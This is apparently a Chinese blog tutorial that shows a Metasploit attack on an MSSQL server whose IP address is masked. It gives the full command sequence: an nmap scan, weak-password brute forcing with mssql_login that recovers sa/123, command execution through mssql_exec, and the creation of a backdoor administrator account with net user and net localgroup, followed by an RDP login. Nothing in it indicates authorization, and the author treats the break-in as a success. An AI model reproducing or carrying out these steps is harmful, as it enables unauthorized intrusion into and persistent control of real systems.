Metasploit-MSSQL渗透-实战篇

Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。


Metasploit-MSSQL渗透-实战篇_第1张图片


打开metasploit的控制台终端:


Metasploit-MSSQL渗透-实战篇_第2张图片


先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。


Metasploit-MSSQL渗透-实战篇_第3张图片


从扫描结果中,我们得知目标对外开放了1433端口对应于ms-sql-s服务,我们就从这里入手,对mssql进行弱口令猜解。搜索适用于mssql的攻击模块。


Metasploit-MSSQL渗透-实战篇_第4张图片


好的,找到进行弱口令扫描的模块了。选中它,然后进行相关的设置,即可开始渗透。


Metasploit-MSSQL渗透-实战篇_第5张图片


主要就是设置攻击目标,扫描线程以及弱口令字典。


msf auxiliary(mssql_login) > set RHOSTS xxx.xx.xxx.xx

RHOSTS => xxx.xx.xxx.xx
msf auxiliary(mssql_login) > set THREADS 5
THREADS => 5
msf auxiliary(mssql_login) > set USERPASS_FILE /root/Desktop/userpass.txt
USERPASS_FILE => /root/Desktop/userpass.txt

Metasploit-MSSQL渗透-实战篇_第6张图片

OK,我们的运气很好,对方管理员的安全意识比较低,使用了弱口令。这样我们就可以使用猜解到的用户名sa和密码123远程连接目标的mssql数据库了。

先退后一步,选择新的攻击模块。
msf auxiliary(mssql_login) > back
msf> use auxiliary/admin/mssql/mssql_exec

Metasploit-MSSQL渗透-实战篇_第7张图片

同样需要配置响应的参数,我先用show options命令查看需要配置哪些参数。
msf auxiliary(mssql_exec) > set PASSWORD 123
PASSWORD => 123
msf auxiliary(mssql_exec) > set CMD cmd.exe /c net user
CMD => cmd.exe /c net user
 msf auxiliary(mssql_exec) > run

主要设置用于连接的用户名和密码,用户名默认是sa,所以不用修改,此外还要设置要执行的命令。

Metasploit-MSSQL渗透-实战篇_第8张图片

看到没有,我们成功了,可以执行命令。接下来自然就是添加管理员用户,远程登录目标主机了。

cmd.exe /c net user shenlan test /add&net localgroup administrator shenlan /add

因为目标主机同时还开启了3389端口,对外提供远程桌面服务,所以我们就不必客气了。
使用命令 rdesktop xxx.xx.xxx.xx 命令远程登录目标主机。

Metasploit-MSSQL渗透-实战篇_第9张图片




你可能感兴趣的:(Metasploit)